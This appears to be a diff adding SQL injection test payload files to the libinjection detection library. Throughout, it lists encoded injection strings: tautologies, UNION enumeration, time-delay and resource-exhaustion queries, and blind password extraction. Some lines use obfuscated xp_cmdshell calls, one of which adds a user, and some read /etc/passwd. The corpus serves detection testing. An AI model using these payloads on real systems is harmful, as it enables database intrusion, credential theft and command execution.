'begin goto label select 1 label: @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'begin goto label label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end--
'goto label label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label ALTER DATABASE pubs SET RECOVERY SIMPLE; label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label INSERT INTO Production.UnitMeasure (Name, UnitMeasureCode,ModifiedDate) VALUES (N'Square Yards', N'Y2', GETDATE()) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label declare @a label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select cast(@@version as varchar) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select @@version label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select "a" label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select 1 label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'select @@version; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 'a'; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 1; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select @@version begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 'a' begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 1 begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select @@version goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'select 'a' goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'select 1 goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x6576563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--

View file

@ -0,0 +1,11 @@
# Not sure of original source
# attributed to David Litchfield
#
234+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29
foo%27+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29--
456+%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10
foo%27%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10--
# overflow
123%2B+%28%280+%2F+ascii%28substring%28passwd%2C1%2C1%29%29+%2A+4294967296%29

View file

@ -0,0 +1,73 @@
# samples
# unlikely to execute correctly
# probably just generated automatically without regard for usefulness
# but seen in wild "FIELD AND NUM=NUM"
# FAILS
#"1*HOPE AND 8=3",
#"0+HOPE AND 8=3",
#"0+(HOPE) AND 8=3",
HOPE%2A1+AND+8%3D3
## HOPE%2A%281%29+AND+8%3D3
# RHS variations
HOPE+AND+8%3D3
HOPE+AND+-8%3D3
HOPE+AND+-8%3D-3
HOPE+AND+%28-8%29%3D%28-3%29
HOPE+AND+%288%29%3D3
HOPE+AND+8%3D%283%29
HOPE+AND+%288%29%3D%283%29
HOPE+AND+1%2B2%3D3%2B4
HOPE+AND+COS%283%29%3DSIN%284%29
# lhs work arounds
HOPE%2A1+AND+8%3D3
## HOPE%2A%281%29+AND+8%3D3
%28HOPE%29+AND+8%3D3
%28HOPE%29%2A1+AND+8%3D3
%28HOPE%29%2B0+AND+8%3D3
1%2A%28HOPE%29+AND+8%3D3
%281%29%2A%28HOPE%29+AND+8%3D3
%281%29%2AHOPE+AND+8%3D3
%28%281%29%29%2AHOPE+AND+8%3D3
%28%281%29%29%2A%28HOPE%29+AND+8%3D3
%28%281%29%29%2A%28%28HOPE%29%29+AND+8%3D3
%28%28%281%29%29%29%2AHOPE+AND+8%3D3
%28%28%28%281%29%29%29%29%2AHOPE+AND+8%3D3
# based on NUM AND 1=1--
PI%28%29+AND+COS%28PI%28%29%29%3D-1
PI%28%29+%26%26+COS%28PI%28%29%29%3D-1
FLOOR%28PI%28%29%29+AND+SIN%28PI%28%29%29%3D0
-9-%282%29+OR+1+%3D+1
8-9+OR+1+%3D+1
-9-%282%29+OR+1+%3D+1
-9-%28%282%29%29+OR+1+%3D+1
-9-%28%28%282%29%29%29+OR+1+%3D+1
%7E9-%282%29+OR+1+%3D+%7E1
a%27%2712%27+and+%28pi%28%29%3Dpi%28%29%29--
a%27%2712%27+and+pi%28%29%3Dpi%28%29--
dingberry%27%271%27+and+%28false%29--
dingberry%27%271%27+and+%28pi%28%29%3D3%29--
dingberry%27%271%27+and+%283%3Dpi%28%29%29--
1%27%2712%27+and+%283%3Dpi%28%29%29--
1%27%2B%2712%27+and+%283%3Dpi%28%29%29--
1%27%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
1%27%2B%28%28%2712%27%29%29+and+%283%3Dpi%28%29%29--
1%27%2B%28%28%28%2712%27%29%29%29+and+%283%3Dpi%28%29%29--
1%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
1%2Bpi%28%29+and+%283%3Dpi%28%29%29--
1%2B%28pi%28%29%29+and+%283%3Dpi%28%29%29--
1%2B%28%28pi%28%29%29%29+and+%283%3Dpi%28%29%29--
1%2B%28%28%28pi%28%29%29%29%29+and+%283%3Dpi%28%29%29--
1%27%2Bpi%28%29+and+%283%3Dpi%28%29%29--
1234%27%27z%27+and+%283%3Dpi%28%29%29--
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D21--
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%2821%29--
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D21--
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%287%2A3%29--
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D%287%2A3%29--
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D7%2A3--
foo%27+and+%281%2B2%2B3%2B%284%2B5%2B6%29%29%3D7%2A3--

View file

@ -0,0 +1,15 @@
#
# from http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
#
999999 or 1=1 or 1=1
' or 1=1 or '1'='1
" or 1=1 or "1"="1
999999) or 1=1 or (1=1
') or 1=1 or ('1'='1
") or 1=1 or ("1"="1
999999)) or 1=1 or ((1=1
')) or 1=1 or (('1'='1
")) or 1=1 or (("1"="1
999999))) or 1=1 or (((1
'))) or 1=1 or ((('1'='1
"))) or 1=1 or ((("1"="1

View file

@ -0,0 +1,44 @@
#
# http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
#
1 or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or 1=1
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6) as test
9999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='9999
9999" or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or "0"="9999
9999'+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+'9999
9999"+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+"9999
9999'||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||'9999
9999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"9999
(select like('abcdefg',upper(hex(randomblob(150000000))))) as test
(select like('abcdefg',upper(hex(randomblob(150000000)))))
9999'||(select like('abcdefg',upper(hex(randomblob(150000000)))))||'9999
9999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"9999
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) as test
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)
9999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'9999
9999"||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||"9999
(select benchmark(15000000,md5(0x4e446b6e))-9999) as test
benchmark(15000000,md5(0x4e446b6e))-9999
9999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='9999
9999" or benchmark(15000000,md5(0x4e446b6e)) or "0"="9999
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)
9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999
9999"+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+"9999
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) as test
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)
9999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'9999
9999"||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||"9999
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)
9999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'9999
9999"||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||"9999
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)
9999'||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||'9999
9999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"9999
(select 99999999 from pg_sleep(15)) as test
(select 99999999 from pg_sleep(15))
9999'||(select 99999999 from pg_sleep(15))||'9999
9999"||(select 99999999 from pg_sleep(15))||"9999

View file

@ -0,0 +1,15 @@
# http://www.blackhatlibrary.net/Comparative_precomputation
ascii(substring(version() from 1 for 1))
length((select length(version())))
ascii(substring(length(version()),1,1))
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=1)
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 1 for 1)))
vulnerable_site' and 1=5 or title=() #'
conv(hex(substr(version() FROM 1 FOR 2)),16,10)
conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6
conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6
uncompress(compress(version()))
LENGTH(compress(version()))
LENGTH(version())
LENGTH(load_file('/etc/passwd'))
LENGTH(compress(load_file('/etc/passwd')))

View file

@ -0,0 +1,40 @@
# http://www.exploit-db.com/papers/17934/
# A few typos corrected
1+or+1+%3D+1
1+%7C%7C+1+%3D+1
1+and+1+%3D+1
1+%26%26+1+%3D+1
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
1+%7C%7C+%28select+user+from+users+limit+1%29+%3D+%27admin%27
1+%7C%7C+%28select+user+from+users+group+by+user_id+having+user_id+%3D+1%29+%3D+%27admin%27
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users+%29+%3D+1
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
1+%7C%7C+1+%3D+1+into+outfile+%27result.txt%27
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+%27a%27
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
1+%7C%7C+user_id+is+not+null
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+0x61
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+unhex%2861%29
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+lower%28conv%2811%2C10%2C36%29%29
1+%7C%7C+lpad%28user%2C7%2C1%29
1%0b||%0blpad(user,7,1)
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+%3D+%27users%27
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+%27a%27+and+%27z%27
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+char%2897%29+and+char%28122%29
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+0x61+and+0x7a
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+like+0x7573657273
1+UnIoN/**/SeLecT/**/1,2,3--
# double url-encoded
## 21%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
21%2f%2a*/union%2f%2a*/select%2f%2a*/1,2,3%2f%2a*/from%2f%2a*/users--
1+/**/union/**/select
1+/%2A%2A/union/%2A%2A/select
1+%2f**%2funion%2f**%2fselect
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
0+div+1+union+select+1%2C2%2Ccurrent_user
1+and+(select 1)=(select+0x414141414141441414141414114141414141414141414141414141414141414141.)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
1/*!UnIoN*/SeLecT+1,2,3--
=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables+*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
1%27%3B+%2F%2A%26id%3D1%2A%2F+EXEC+%2F%2A%26id%3D1%2A%2F+master..xp_cmdshell+%2F%2A%26id%3D1%2A%2F+net+user+lucifer+UrWaFisShiT+%2F%2A%26id%3D1%2A%2F+--

14072
libinjection/data/sqli-forums.txt Executable file

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,131 @@
#
# Frequently not SQLi but
#
select 1 from foo where
select @version from foo where
select 'foo' from bar where
# select 1,1,1,1,1,1,1
# select @version,@version,@version
# select 'foo','bar',1,2,3,4
select sin(1),2 from bar where
select sin(id),2 from bar where
select sin('1'),2 from bar where
select sin(@version),2 from bar where
select sin((1)),2 from bar where
select sin((id)),2 from bar where
select sin(('1')),2 from bar where
select sin((@version)),2 from bar where
select sin(((1)),2 from bar where
select sin(((id)),2 from bar where
select sin((('1')),2 from bar where
select sin(((@version)),2 from bar where
select -sin(1),2 from bar where
select -sin(id),2 from bar where
select -sin('1'),2 from bar where
select -sin(@version),2 from bar where
select -sin((1)),2 from bar where
select -sin((id)),2 from bar where
select -sin(('1')),2 from bar where
select -sin((@version)),2 from bar where
select -sin(((1)),2 from bar where
select -sin(((id)),2 from bar where
select -sin((('1')),2 from bar where
select -sin(((@version)),2 from bar where
select 1,sin(1),2 from bar where
select 1,sin(id),2 from bar where
select 1,sin('1'),2 from bar where
select 1,sin(@version),2 from bar where
select 1,sin((1)),2 from bar where
select 1,sin((id)),2 from bar where
select 1,sin(('1')),2 from bar where
select 1,sin((@version)),2 from bar where
select 1,sin(((1)),2 from bar where
select 1,sin(((id)),2 from bar where
select 1,sin((('1')),2 from bar where
select 1,sin(((@version)),2 from bar where
select -1,sin(1),2 from bar where
select -1,sin(id),2 from bar where
select -1,sin('1'),2 from bar where
select -1,sin(@version),2 from bar where
select -1,sin((1)),2 from bar where
select -1,sin((id)),2 from bar where
select -1,sin(('1')),2 from bar where
select -1,sin((@version)),2 from bar where
select -1,sin(((1)),2 from bar where
select -1,sin(((id)),2 from bar where
select -1,sin((('1')),2 from bar where
select -1,sin(((@version)),2 from bar where
select id,sin(1),2 from bar where
select id,sin(id),2 from bar where
select id,sin('1'),2 from bar where
select id,sin(@version),2 from bar where
select id,sin((1)),2 from bar where
select id,sin((id)),2 from bar where
select id,sin(('1')),2 from bar where
select id,sin((@version)),2 from bar where
select id,sin(((1)),2 from bar where
select id,sin(((id)),2 from bar where
select id,sin((('1')),2 from bar where
select id,sin(((@version)),2 from bar where
select @version,sin(1),2 from bar where
select @version,sin(id),2 from bar where
select @version,sin('1'),2 from bar where
select @version,sin(@version),2 from bar where
select @version,sin((1)),2 from bar where
select @version,sin((id)),2 from bar where
select @version,sin(('1')),2 from bar where
select @version,sin((@version)),2 from bar where
select @version,sin(((1)),2 from bar where
select @version,sin(((id)),2 from bar where
select @version,sin((('1')),2 from bar where
select @version,sin(((@version)),2 from bar where
select '1',sin(1),2 from bar where
select '1',sin(id),2 from bar where
select '1',sin('1'),2 from bar where
select '1',sin(@version),2 from bar where
select '1',sin((1)),2 from bar where
select '1',sin((id)),2 from bar where
select '1',sin(('1')),2 from bar where
select '1',sin((@version)),2 from bar where
select '1',sin(((1)),2 from bar where
select '1',sin(((id)),2 from bar where
select '1',sin((('1')),2 from bar where
select '1',sin(((@version)),2 from bar where
select -'1',sin(1),2 from bar where
select -'1',sin(id),2 from bar where
select -'1',sin('1'),2 from bar where
select -'1',sin(@version),2 from bar where
select -'1',sin((1)),2 from bar where
select -'1',sin((id)),2 from bar where
select -'1',sin(('1')),2 from bar where
select -'1',sin((@version)),2 from bar where
select -'1',sin(((1)),2 from bar where
select -'1',sin(((id)),2 from bar where
select -'1',sin((('1')),2 from bar where
select -'1',sin(((@version)),2 from bar where
select 1,(2),3 from bar where
select (1),(2),3 from bar where
select ((1)),(2),3 from bar where
select (((1))),(2),3 from bar where
select ('1'),(2),3 from bar where
select (('1')),(2),3 from bar where
select ((('1'))),(2),3 from bar where
select (@version),(2),3 from bar where
select ((@version)),(2),3 from bar where
select (((@version))),(2),3 from bar where
select (id),(2),3 from bar where
select ((id)),(2),3 from bar where
select (((id))),(2),3 from bar where
select (@version),(2),3 from bar where
select (((((1,2,3,4)))) from bar

View file

@ -0,0 +1,315 @@
#
#
#
( 'a' ) --
' - ( (SELECT BINARY ( 'b')) ) --
' - ( ( BINARY COS ( 'b')) ) --
' - ( BINARY BINARY ( 'b') ) --
( 1 OR 1 ) --
( 1 OR @a ) --
( ( 1 ) ) --
( 1 * @a ) --
( (SELECT ( 1)) ) --
( (SELECT ( @a)) ) --
( BINARY ( 1) ) --
( BINARY ( @a) ) --
( @a OR 1 ) --
( @a OR @a ) --
( ( @a ) ) --
( ( 1 OR 'b') ) --
( ( 1 * 'b') ) --
( (SELECT ( SELECT 'b')) ) --
( ( SELECT ( 'b')) ) --
( (SELECT 1 OR 'b') ) --
( (SELECT 'a' OR 'b') ) --
( (SELECT BINARY ( 'b')) ) --
( (SELECT BINARY COS ( 'b')) ) --
( (SELECT @a OR 'b') ) --
( COS ( 1 OR 'b') ) --
( COS ( 'a' OR 'b') ) --
( COS ( BINARY ( 'b')) ) --
( COS ( BINARY COS ( 'b')) ) --
( COS ( @a OR 'b') ) --
( 'a' OR 1 ) --
( 'a' OR 'a' ) --
( 'a' OR @a ) --
( 'a' ) --
( 'a' * 1 ) --
( 'a' * 'a' ) --
( 'a' * @a ) --
( BINARY ( SELECT 'b') ) --
( ( BINARY ( 'b')) ) --
( BINARY BINARY ( 'b') ) --
( BINARY BINARY COS ( 'b') ) --
( ( @a OR 'b') ) --
( ( @a * 'b') ) --
( 1 in ( BINARY COS ( 'b')) ) --
( (SELECT ( 1 OR 'b')) ) --
( (SELECT ( SELECT 1)) ) --
( (SELECT ( SELECT @a)) ) --
( (SELECT ( 'a' OR 'b')) ) --
( (SELECT ( BINARY ( 'b'))) ) --
( (SELECT ( BINARY COS ( 'b'))) ) --
( (SELECT ( @a OR 'b')) ) --
( (SELECT 1 OR ( 'b')) ) --
( (SELECT 1 OR 1) ) --
( (SELECT 1 OR COS ( 'b')) ) --
( (SELECT 1 OR @a) ) --
( (SELECT 1 LIMIT 1) ) --
( (SELECT COS ( 1 OR 'b')) ) --
( (SELECT COS ( ( SELECT 'b'))) ) --
( (SELECT COS ( 'a' OR 'b')) ) --
( (SELECT COS ( BINARY ( 'b'))) ) --
( (SELECT COS ( BINARY COS ( 'b'))) ) --
( (SELECT COS ( @a OR 'b')) ) --
( (SELECT 'a' OR ( 'b')) ) --
( (SELECT 'a' OR 1) ) --
( (SELECT 'a' OR COS ( 'b')) ) --
( (SELECT 'a' OR @a) ) --
( (SELECT 'a' LIMIT 1) ) --
( (SELECT BINARY ( 1)) ) --
( (SELECT BINARY ( SELECT 'b')) ) --
( (SELECT BINARY ( COS ( 'b'))) ) --
( (SELECT BINARY ( @a)) ) --
( (SELECT BINARY COS ( 1)) ) --
( (SELECT BINARY COS ( COS ( 'b'))) ) --
( (SELECT BINARY COS ( @a)) ) --
( (SELECT BINARY BINARY ( 'b')) ) --
( (SELECT BINARY BINARY COS ( 'b')) ) --
( (SELECT @a OR ( 'b')) ) --
( (SELECT @a OR 1) ) --
( (SELECT @a OR COS ( 'b')) ) --
( (SELECT @a OR @a) ) --
( (SELECT @a LIMIT 1) ) --
( COS ( 1 OR ( 'b')) ) --
( COS ( 1 OR 1) ) --
( COS ( 1 OR COS ( 'b')) ) --
( COS ( 1 OR @a) ) --
( COS ( COS ( ( SELECT 'b'))) ) --
( COS ( COS ( BINARY ( 'b'))) ) --
( COS ( 'a' OR ( 'b')) ) --
( COS ( 'a' OR 1) ) --
( COS ( 'a' OR COS ( 'b')) ) --
( COS ( 'a' OR @a) ) --
( COS ( BINARY ( 1)) ) --
( COS ( BINARY ( SELECT 'b')) ) --
( COS ( BINARY ( COS ( 'b'))) ) --
( COS ( BINARY ( @a)) ) --
( COS ( BINARY BINARY ( 'b')) ) --
( COS ( BINARY BINARY COS ( 'b')) ) --
( COS ( @a OR ( 'b')) ) --
( COS ( @a OR 1) ) --
( COS ( @a OR COS ( 'b')) ) --
( COS ( @a OR @a) ) --
( BINARY ( 1 OR 'b') ) --
( BINARY ( SELECT ( 'b')) ) --
( BINARY ( SELECT 1) ) --
( BINARY ( SELECT COS ( 'b')) ) --
( BINARY ( SELECT @a) ) --
( BINARY ( 'a' OR 'b') ) --
( BINARY ( BINARY COS ( 'b')) ) --
( BINARY ( @a OR 'b') ) --
( BINARY COS ( 1 OR 'b') ) --
( BINARY COS ( ( SELECT 'b')) ) --
( BINARY COS ( 'a' OR 'b') ) --
( BINARY COS ( BINARY ( 'b')) ) --
( BINARY COS ( BINARY COS ( 'b')) ) --
( BINARY COS ( @a OR 'b') ) --
( BINARY BINARY ( 1) ) --
( BINARY BINARY ( SELECT 'b') ) --
( BINARY BINARY ( COS ( 'b')) ) --
( BINARY BINARY ( @a) ) --
( BINARY BINARY COS ( 1) ) --
( BINARY BINARY COS ( COS ( 'b')) ) --
( BINARY BINARY COS ( @a) ) --
( BINARY BINARY BINARY ( 'b') ) --
( BINARY BINARY BINARY COS ( 'b') ) --
( @a in ( BINARY COS ( 'b')) ) --
( 1 OR ( BINARY ( 'b')) ) --
( 1 OR ( BINARY COS ( 'b')) ) --
( 1 OR COS ( BINARY ( 'b')) ) --
( 1 ) in ( BINARY ( 'b') ) --
( 1 in ( BINARY BINARY ( 'b')) ) --
( 1 * COS ( BINARY ( 'b')) ) --
( (SELECT ( 1 OR ( 'b'))) ) --
( (SELECT ( 1 OR 1)) ) --
( (SELECT ( 1 OR COS ( 'b'))) ) --
( (SELECT ( 1 OR @a)) ) --
( (SELECT ( SELECT 1 OR 'b')) ) --
( (SELECT ( SELECT 'a' OR 'b')) ) --
( (SELECT ( SELECT BINARY ( 'b'))) ) --
( (SELECT ( SELECT BINARY COS ( 'b'))) ) --
( (SELECT ( SELECT @a OR 'b')) ) --
( (SELECT ( COS ( ( SELECT 'b')))) ) --
( (SELECT ( COS ( BINARY ( 'b')))) ) --
( (SELECT ( 'a' OR ( 'b'))) ) --
( (SELECT ( 'a' OR 1)) ) --
( (SELECT ( 'a' OR COS ( 'b'))) ) --
( (SELECT ( 'a' OR @a)) ) --
( (SELECT ( BINARY ( 1))) ) --
( (SELECT ( BINARY ( SELECT 'b'))) ) --
( (SELECT ( BINARY ( COS ( 'b')))) ) --
( (SELECT ( BINARY ( @a))) ) --
( (SELECT ( BINARY BINARY ( 'b'))) ) --
( (SELECT ( BINARY BINARY COS ( 'b'))) ) --
( (SELECT ( @a OR ( 'b'))) ) --
( (SELECT ( @a OR 1)) ) --
( (SELECT ( @a OR COS ( 'b'))) ) --
( (SELECT ( @a OR @a)) ) --
( (SELECT 1 OR ( 1)) ) --
( (SELECT 1 OR ( COS ( 'b'))) ) --
( (SELECT 1 OR ( @a)) ) --
( (SELECT 1 OR 1 * 'b') ) --
( (SELECT 1 OR 'a' * 'b') ) --
( (SELECT 1 OR @a * 'b') ) --
( (SELECT 1 ) OR ( 'b') ) --
( (SELECT 1 ) OR COS ( 'b') ) --
( ( SELECT 1 ) OR 'b' ) --
( (SELECT 1 UNION ( SELECT 'b')) ) --
( (SELECT 1 in ( BINARY ( 'b'))) ) --
( (SELECT COS ( ( SELECT ( 'b')))) ) --
( (SELECT COS ( ( SELECT 1))) ) --
( (SELECT COS ( ( SELECT COS ( 'b')))) ) --
( (SELECT COS ( ( SELECT @a))) ) --
( (SELECT COS ( BINARY BINARY ( 'b'))) ) --
( (SELECT 'a' OR ( 1)) ) --
( (SELECT 'a' OR ( COS ( 'b'))) ) --
( (SELECT 'a' OR ( @a)) ) --
( (SELECT 'a' OR 1 * 'b') ) --
( (SELECT 'a' OR 'a' * 'b') ) --
( (SELECT 'a' OR @a * 'b') ) --
( (SELECT 'a' ) OR ( 'b') ) --
( (SELECT 'a' ) OR COS ( 'b') ) --
( ( SELECT 'a' ) OR 'b' ) --
( (SELECT 'a' UNION ( SELECT 'b')) ) --
( (SELECT 'a' in ( BINARY ( 'b'))) ) --
( (SELECT BINARY ( 1 OR 'b')) ) --
( (SELECT BINARY ( 1 * 'b')) ) --
( (SELECT BINARY ( SELECT ( 'b'))) ) --
( (SELECT BINARY ( SELECT 1)) ) --
( (SELECT BINARY ( SELECT COS ( 'b'))) ) --
( (SELECT BINARY ( SELECT @a)) ) --
( (SELECT BINARY ( 'a' OR 'b')) ) --
( (SELECT BINARY ( 'a' * 'b')) ) --
( (SELECT BINARY ( BINARY ( 'b'))) ) --
( (SELECT BINARY ( BINARY COS ( 'b'))) ) --
( (SELECT BINARY ( @a OR 'b')) ) --
( (SELECT BINARY ( @a * 'b')) ) --
( (SELECT BINARY COS ( ( SELECT 'b'))) ) --
( (SELECT BINARY COS ( BINARY ( 'b'))) ) --
( (SELECT BINARY BINARY ( 1)) ) --
( (SELECT BINARY BINARY ( SELECT 'b')) ) --
( (SELECT BINARY BINARY ( COS ( 'b'))) ) --
( (SELECT BINARY BINARY ( @a)) ) --
( (SELECT BINARY BINARY BINARY ( 'b')) ) --
( (SELECT BINARY BINARY BINARY COS ( 'b')) ) --
